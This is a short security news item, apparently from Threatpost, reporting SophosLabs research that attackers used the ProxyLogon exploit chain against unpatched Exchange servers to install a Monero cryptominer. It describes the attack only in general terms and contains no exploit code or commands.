Security News > 2021 > April > Attackers Target ProxyLogon Exploit to Install Cryptojacker

Cryptojacking can be added to the list of threats that face any unpatched Exchange servers that remain vulnerable to the now-infamous ProxyLogon exploit, new research has found.

Researchers discovered the threat actors using Exchange servers compromised using the highly publicized exploit chain-which suffered a barrage of attacks from advanced persistent threat groups to infect systems with everything from ransomware to webshells-to host Monero cryptomining malware, according to a report posted online this week by SophosLabs.

"An unknown attacker has been attempting to leverage what's now known as the ProxyLogon exploit to foist a malicious Monero cryptominer onto Exchange servers, with the payload being hosted on a compromised Exchange server," Sophos principal researcher Andrew Brandt wrote in the report.

The attack as observed by researchers began with a PowerShell command to retrieve a file named win r.zip from another compromised server's Outlook Web Access logon path, according to the report.

The ProxyLogon problem started for Microsoft in early March when the company said it had spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server.

Together the flaws created a pre-authentication remote code execution exploit, meaning attackers can take over servers without knowing any valid account credentials.

News URL

https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/